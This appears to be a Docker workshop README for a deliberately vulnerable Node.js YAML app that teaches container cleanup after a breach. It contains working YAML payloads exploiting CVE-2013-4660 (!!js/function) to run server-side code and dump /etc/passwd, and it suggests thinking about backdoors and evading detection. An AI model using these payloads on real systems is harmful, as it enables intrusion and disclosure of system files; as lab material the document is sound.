# Exercise 2: Become a Hacker

In this exercise, you will:
- build a image from a Dockerfile
- create a container from your own image
- use your app in a browser
- hack your container, twice

## Vulnerable nodejs app for demos

**WARNING**: *This app deliberately exposes a RCE vulnerability (CVE-2013-4660). It is meant to demonstrate the use of Docker to clean up after a breach and prevent them from happening again in the future.*

#### Step 1: Build & run

    docker build -t node-hack .
    docker run -d --rm -p 1337:1337 --name node-hack node-hack

#### Step 2: Browse to app

You should now be able to access the application by opening a browser and going to the address of your machine and port 1337.

If you're using docker-machine:

    chrome http://$(docker-machine ip default):1337

If you're running a new version of Docker, just navigate to <http://localhost:1337>

### Step 3: Use your container app

Try out the application with some simple YAML examples such as the following (more snippets can be found in the ​yaml​ subdirectory):

    ---
    oh: wow!
    what: a nice YAML that is!
    look_ma:
      - it
      - also
      - highlights
      - lists!

### Step 4: Hack your container

Now that we have the application working, it’s time to hack it! It turns out the library used to parse our YAML is vulnerable to CVE-2013-4660, which allows for the execution of arbitrary JavaScript code.
Try prettifying the following snippet (`yaml/evil.yml`):

    ---
    hi: there
    test: !!js/function |
      function f() {
        console.log('Hello from server side!');
      }();

Browse to start page to see defaced website.
You should see this looks a bit fishy. If we take a look at the logs for the application (run `docker logs node-hack`​), you should see that the JavaScript function has executed on the server!

### Step 5: Play around with other hacks

`docker stop node-hack` & re-run container to show the breach caused by `evil.yml` is gone again.

We can of course take this further. If you know JavaScript feel free to play around with what’s possible. If you take a look at ​server.js​, you will see that various modules have been loaded into the global namespace, so they are available to use directly.
As the fs module has been loaded, it’s easy for us to interact with the filesystem. Let’s start by dumping​ `/etc/passwd​`.

    ---
    hi: there
    test: !!js/function |
      function f() {
        fs.readFile('/etc/passwd', 'ascii', function (err, data) {
           if (err) throw err;
           console.log(data);
        });
      }();

You should now see the output of the file in docker logs. We could also have written the contents out to another file, potentially accessible to the attacker.
Now let’s do something a little more disruptive. Try evaluating the YAML inside the file yaml/evil.yml ​. After clicking “Go back”, you may get a surprise...
If you want to take this even further, have a think about how you could avoid detection and insert backdoors in the system.

